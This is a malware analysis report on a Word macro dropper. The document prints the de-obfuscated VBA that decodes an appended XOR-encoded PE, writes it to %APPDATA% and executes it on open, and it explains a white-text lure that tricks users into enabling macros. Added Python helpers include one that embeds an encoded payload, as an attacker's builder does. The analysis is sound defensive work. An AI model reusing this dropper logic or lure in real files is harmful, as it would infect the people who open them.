Analysis Report: embedding malicious payload Word documents


A week ago Xavier Mertens, SANS ISC handler and freelance security consultant, analyzed a malicious Word document. The following is his analysis report.

Event background

Last week I spent some time on an interesting malicious Word document found during a security incident. Malicious OLE documents are nothing new: I receive many of them by email every day, and they will keep coming until attackers find a better way to reach the end user's computer. Typically, a malicious macro relies on social engineering to trick the user into enabling it, then downloads the real payload through an MSXML2.ServerXMLHTTP object.

Here is an example of an obfuscated object name being assembled to issue a GET request:

BHJQWGDHJQWGDWQ = "MSXML2." & "Ser" & "ver" & "X" & "MLH" & "TT" & "P"   ' resolves to "MSXML2.ServerXMLHTTP"
Set Tghafsdghqhjwgdhjqwgdjhqwgdqwd = CreateObject(BHJQWGDHJQWGDWQ)
Tghafsdghqhjwgdhjqwgdjhqwgdqwd.Open "G" & "" & "ET", ggFw                  ' resolves to "GET"; ggFw holds the URL

Whether that is good or bad news depends on your point of view: such samples are useful to researchers because they hand us IOCs (IP addresses, URLs, domain names and file names), and de-obfuscating the macro to collect them is usually easy.

In the incident I was looking into, the macro in the Word document did not generate any network traffic: the payload was embedded at the end of the Word document from the start. The document dates from September 2015 (see the metadata below) and three days ago it scored only 2/43 on VirusTotal; I was the first to submit it. The document is nicely formatted, with content designed to lure the victim. I analyzed it with Didier Stevens's toolbox.

Malicious File Analysis Report

The document was created by the user Helmut on September 3, 2015 and contains two macro streams:

$ oledump.py malicious.doc
  1:       121 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:     23860 '1Table'
  5:    781575 'Data'
  6:       486 'Macros/PROJECT'
  7:        71 'Macros/PROJECTwm'
  8: m     940 'Macros/VBA/ThisDocument'
  9:      3256 'Macros/VBA/_VBA_PROJECT'
 10:       569 'Macros/VBA/dir'
 11: M    6052 'Macros/VBA/islamabad'
 12:    257675 'WordDocument'

The interesting one is stream 11, named "islamabad" (the capital of Pakistan). In oledump's output a lowercase m marks a macro stream that only holds attribute lines, while an uppercase M marks a stream with actual code, so stream 11 is the one to look at. It is a classic obfuscated macro and can be extracted with the following command:

$ oledump.py -s 11 -v malicious.doc

Note: I have renamed variables and de-obfuscated the strings in the macro code shown below so that it is easier to read.

The payload (a PE file) is stored at the end of the Word document together with some extra data (the payload size and a checksum). Let's look at the code:

Attribute VB_Name = "islamabad"
Public var_Filename1 As String
Public var_Path1 As String

The first function computes the checksum of a data stream (a plain XOR of all its bytes):

Function func_Checksum(var_Data() As Byte, var_Len As Long) As Byte
    For I = 0 To var_Len - 1
        func_Checksum = func_Checksum Xor var_Data(I)
    Next I
End Function

The next function decodes the binary data stream in place with a rolling XOR key: the key starts at 11 and is updated after every byte:

Function func_DecodeBinary(var_Data() As Byte, var_Len As Long) As Boolean
    Dim var_IV1 As Byte
    var_IV1 = 11
    For I = 0 To var_Len - 1
        var_Data(I) = var_Data(I) Xor var_IV1
        var_IV1 = ((var_IV1 Xor 13) Xor (I Mod 256))
    Next I
    func_DecodeBinary = True
End Function

This VBA function changes the document layout; at first I did not understand why (see the postscript below):

Function func_FormatDocument() As Boolean
    ActiveDocument.GrammarChecked = False
    ActiveDocument.SpellingChecked = False
    ActiveDocument.Select
    Selection.Font.ColorIndex = wdBlack
    Selection.Font.Underline = wdUnderlineNone
    Selection.HomeKey
    For Each sec In ActiveDocument.Sections
        For Each head In sec.Headers
            head.Range.Delete
        Next
    Next
    ViewDocument = True
End Function

Sub AutoClose()
    ActiveDocument.Save
End Sub

When the document is opened, the main macro runs automatically:

Sub AutoOpen()
    On Error GoTo ErrorCondition1
    Dim var_Dummy1 As Boolean
    var_Dummy1 = func_FormatDocument()
    Dim fh_File1
    Dim var_Filesize As Long
    Dim var_BinarySize As Long
    Dim var_Checksum As Byte

It gets the file size, opens the document itself and reads the checksum byte at position EOF-4 and the size of the binary data stream at EOF-3. VBA file positions are 1-based and a Long is four bytes, so the last five bytes of the file are one checksum byte followed by a 4-byte little-endian length:

    var_Filesize = FileLen(ActiveDocument.FullName)
    fh_File1 = FreeFile
    Open (ActiveDocument.FullName) For Binary As #fh_File1
    Get #fh_File1, (var_Filesize - 4), var_Checksum
    Get #fh_File1, (var_Filesize - 3), var_BinarySize

    If var_BinarySize < 8 Then
        GoTo ErrorCondition1
    End If

    If (var_BinarySize + 4) > var_Filesize Then
        GoTo ErrorCondition1
    End If

Next it computes the start offset of the data stream and dimensions a byte array of the right size:

    Dim var_Offset As Long
    var_Offset = var_Filesize - (var_BinarySize + 4)
    Dim var_BinaryData1() As Byte
    ReDim var_BinaryData1(var_BinarySize - 1)

Then the encoded binary is read from the file and decoded:

    Get #fh_File1, var_Offset, var_BinaryData1
    Close #fh_File1
    If Not func_DecodeBinary(var_BinaryData1(), var_BinarySize) Then
        GoTo ErrorCondition1
    End If

The checksum of the decoded data is then compared with the one stored in the trailer:

    Dim var_Dummy2 As Byte
    var_Dummy2 = func_Checksum(var_BinaryData1(), var_BinarySize)
    If var_Checksum <> var_Dummy2 Then
        GoTo ErrorCondition1
    End If

The default drop path for the payload is obfuscated with Chr() calls (the real value is %APPDATA%\Microsoft\Word):

var_Path1 = Environ(Chr(97) & Chr(112) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(97)) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100)

The Scripting.FileSystemObject object name is obfuscated the same way:

Set var_Object1 = CreateObject("Scripting" & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))

If the default folder does not exist (not the case here), the macro falls back to %APPDATA% itself:

    If Not var_Object1.FolderExists(var_Path1) Then
        var_Path1 = Environ(Chr(97) & Chr(112) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(97))
    End If

    Set var_Object1 = Nothing
    Dim fh_File2
    fh_File2 = FreeFile

The dropped file name is obfuscated too (real name: wfletxavb.exe):

Note: I don't know why the file name is hard-coded here rather than generated dynamically, as is common; a random name would make the dropped binary harder to spot on the file system.

    var_Filename1 = var_Path1 & "\" & Chr(119) & Chr(102) & Chr(108) & Chr(101) & Chr(116) & Chr(120) & Chr(97) & Chr(118) & Chr(98) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
    Open (var_Filename1) For Binary As #fh_File2
    Put #fh_File2, 1, var_BinaryData1
    Close #fh_File2
    Erase var_BinaryData1
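The Chr() and & concatenation used for the path, the object name and the file name is mechanical enough to undo with a small script instead of by hand. The following Python is an added example, not code from the original report or from Didier Stevens's tools: it folds chains of "literal" and Chr(NN) pieces joined with & back into a single string literal, then lists the recovered literals as candidate IOCs. The sample input is built from the obfuscated lines quoted from the macro above; the script assumes only Chr() is used (no ChrW, Chr$ or line continuations), which holds for this sample.

```python
import re

# One "piece" of an obfuscated string: a quoted literal or a Chr(NN) call.
PIECE = r'"[^"]*"|Chr\s*\(\s*\d+\s*\)'
# A chain of two or more pieces glued with &, e.g.  "Ser" & "ver" & Chr(88)
CHAIN_RE = re.compile(rf'(?:{PIECE})(?:\s*&\s*(?:{PIECE}))+', re.IGNORECASE)
PIECE_RE = re.compile(r'"([^"]*)"|Chr\s*\(\s*(\d+)\s*\)', re.IGNORECASE)
LONE_CHR_RE = re.compile(r'Chr\s*\(\s*(\d+)\s*\)', re.IGNORECASE)


def _vba_quote(text):
    # VBA escapes a double quote inside a literal by doubling it
    return '"' + text.replace('"', '""') + '"'


def _fold_chain(match):
    # Resolve every piece of a chain and emit one literal in its place
    parts = []
    for literal, code in PIECE_RE.findall(match.group(0)):
        parts.append(chr(int(code)) if code else literal)
    return _vba_quote("".join(parts))


def deobfuscate(vba_source):
    """Rewrite each line with its string concatenations folded into one literal."""
    out = []
    for line in vba_source.splitlines():
        line = CHAIN_RE.sub(_fold_chain, line)
        # a Chr() that was not part of a chain is still worth resolving
        line = LONE_CHR_RE.sub(lambda m: _vba_quote(chr(int(m.group(1)))), line)
        out.append(line)
    return "\n".join(out)


def recovered_literals(vba_source, min_len=4):
    """String literals present after folding, in order of first appearance.
    These are the candidate IOCs (object names, paths, file names) the
    obfuscation was hiding; very short ones such as "GET" are dropped."""
    found = []
    for literal in re.findall(r'"((?:[^"]|"")*)"', deobfuscate(vba_source)):
        literal = literal.replace('""', '"')
        if len(literal) >= min_len and literal not in found:
            found.append(literal)
    return found


# Constructed input: the obfuscated lines quoted from the macro above.
SAMPLE_VBA = r'''
BHJQWGDHJQWGDWQ = "MSXML2." & "Ser" & "ver" & "X" & "MLH" & "TT" & "P"
Tghafsdghqhjwgdhjqwgdjhqwgdqwd.Open "G" & "" & "ET", ggFw
var_Path1 = Environ(Chr(97) & Chr(112) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(97)) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100)
Set var_Object1 = CreateObject("Scripting" & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
var_Filename1 = var_Path1 & "\" & Chr(119) & Chr(102) & Chr(108) & Chr(101) & Chr(116) & Chr(120) & Chr(97) & Chr(118) & Chr(98) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
'''

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_VBA))
    print(recovered_literals(SAMPLE_VBA))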

Finally, the dropped file is executed:

    Set var_Object2 = CreateObject("WScript.Shell")
    var_Object2.Exec var_Filename1
    Exit Sub

ErrorCondition1:
    Close #fh_File1
    Close #fh_File2
    ActiveDocument.Save
End Sub

Working backward from the macro, we can work out the start position of the binary stream and extract it with Didier's cut-bytes.py. We also have to skip the last bytes of the document, which hold the payload size and the checksum.

Note: Didier added a new feature to his tool that helps here: a negative end offset counts from the end of the file, so -5 in the command below drops the five trailer bytes. The start offset worked out from the macro goes before the colon (it was lost in this copy of the report and is shown as a placeholder):

$ cut-bytes.py "<start offset>:-5" malicious.doc > binary.data
$ file binary.data
binary.data: data
 

The decoding routine from the macro can be ported to Python and used as a custom decoder with Didier's translate.py:

def FileDecode(input):
    # Port of func_DecodeBinary: rolling XOR key seeded with 11 and
    # updated after every byte with (key ^ 13) ^ (index mod 256).
    # Works on both Python 2 str and Python 3 bytes input.
    output = bytearray()
    code = 11
    for iIter, value in enumerate(bytearray(input)):
        output.append(value ^ code)
        code = (code ^ 13) ^ (iIter % 256)
    return bytes(output)

With that decoder we can decode the binary stream and obtain a PE file:

$ cat binary.data | translate.py -f -s decoder_caseXXXX.py -o binary.exe FileDecode
$ file binary.exe
binary.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
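Putting the macro logic and the decoder together, here is a stand-alone Python extractor, added as an example: it is neither code from the report nor part of Didier's tools. It reads the five-byte trailer the way AutoOpen does, applies the macro's size checks, carves and decodes the payload with the rolling XOR and verifies the checksum, so there is no need to guess a start offset for cut-bytes.py. It runs against a constructed document in which an OLE magic plus filler stands in for the real file and a short MZ stub stands in for the dropped executable; the embed_payload helper shows how a builder produces such a file in the first place.

```python
import struct

# Layout inferred from the macro, read from the end of the file:
#   [OLE document][rolling-XOR encoded PE][checksum: 1 byte][payload size: 4-byte little-endian Long]
TRAILER_LEN = 5
KEY_SEED = 11    # initial value of var_IV1 in func_DecodeBinary
KEY_STEP = 13    # constant the key is XORed with after every byte


def rolling_xor(data):
    """Port of func_DecodeBinary. The key schedule depends only on the byte
    index, so the transform is its own inverse and encodes as well as decodes."""
    out = bytearray(len(data))
    key = KEY_SEED
    for i, b in enumerate(data):
        out[i] = b ^ key
        key = (key ^ KEY_STEP) ^ (i % 256)   # stays within 0..255, like a VBA Byte
    return bytes(out)


def xor_checksum(data):
    """Port of func_Checksum: XOR of all bytes. The macro applies it to the
    decoded payload, so a wrong key schedule shows up as a mismatch."""
    c = 0
    for b in data:
        c ^= b
    return c


def embed_payload(doc, payload):
    """Append an encoded payload plus trailer, as the attacker's builder must do.
    Used here only to construct a test document."""
    trailer = bytes([xor_checksum(payload)]) + struct.pack("<I", len(payload))
    return doc + rolling_xor(payload) + trailer


def extract_payload(doc):
    """Replicate AutoOpen: read the trailer, sanity-check the declared size,
    carve the encoded bytes, decode and verify the checksum.
    VBA file positions are 1-based; comments give the macro's own positions."""
    filesize = len(doc)
    if filesize < TRAILER_LEN:
        raise ValueError("file too small to carry a trailer")
    checksum = doc[filesize - 5]                            # Get #fh, filesize-4, var_Checksum
    (binsize,) = struct.unpack("<I", doc[filesize - 4:])    # Get #fh, filesize-3, var_BinarySize
    if binsize < 8:
        raise ValueError("declared payload size too small")
    # The macro only rejects binsize + 4 > filesize, one byte looser than the
    # five-byte trailer allows; the strict bound avoids a negative carve offset.
    if binsize + TRAILER_LEN > filesize:
        raise ValueError("declared payload size does not fit in the file")
    start = filesize - (binsize + TRAILER_LEN)              # var_Offset, converted to 0-based
    decoded = rolling_xor(doc[start:start + binsize])
    if xor_checksum(decoded) != checksum:
        raise ValueError("checksum mismatch: wrong carve boundaries or key schedule")
    return decoded


def is_pe(data):
    """Cheap plausibility check on the carved result: PE files start with 'MZ'."""
    return data[:2] == b"MZ"


# Constructed sample: OLE magic plus filler instead of a real document, and a
# short 'MZ' stub instead of the dropped wfletxavb.exe.
FAKE_DOC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64
FAKE_PE = b"MZ\x90\x00" + bytes(range(60)) + b"PE\x00\x00"
SAMPLE = embed_payload(FAKE_DOC, FAKE_PE)

if __name__ == "__main__":
    carved = extract_payload(SAMPLE)
    print("payload bytes:", len(carved), "looks like PE:", is_pe(carved))
```

On a real sample, call extract_payload(open(path, "rb").read()) and write the result to disk for the usual PE triage. A checksum mismatch is the useful failure mode: it means either the carve boundaries or the key schedule differ from this sample, which is exactly what to expect when the attackers re-use the builder with a tweaked constant.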

I did not submit the PE sample to VirusTotal, but it is clearly malicious.

The file layout is simple: the OLE document, the XOR-encoded PE file, one checksum byte and the PE length. With such a builder the attackers can quickly generate a new encoded PE and append it to the same Word document. Unfortunately I cannot share the sample here, because the investigation is still ongoing.

Event postscript

Didier Stevens, mentioned above, wrote a follow-up to this analysis. Xavier had pointed out a VBA function, func_FormatDocument, that changes the document layout, without understanding its purpose. Here is Didier's explanation of what it does.

This function is part of the social engineering. By default, Microsoft Office disables macros in documents received as email attachments; if the attacker cannot trick the user into enabling them, the attack fails.

So the attacker uses a small trick to persuade the user to enable macros: convince the user that the document contains confidential or secret information and that macros must be enabled to view it. The document claims to hold hidden, encoded or encrypted content; what must you do to reveal it? The VBA function func_FormatDocument is part of this social engineering. Once the user enables macros, the function changes the font color of the text from white to black, "decrypting" the hidden content and showing the user the instructions for viewing the "real" content. With this crude trick the attacker fools the user into enabling the VBA macro and running the malicious payload.
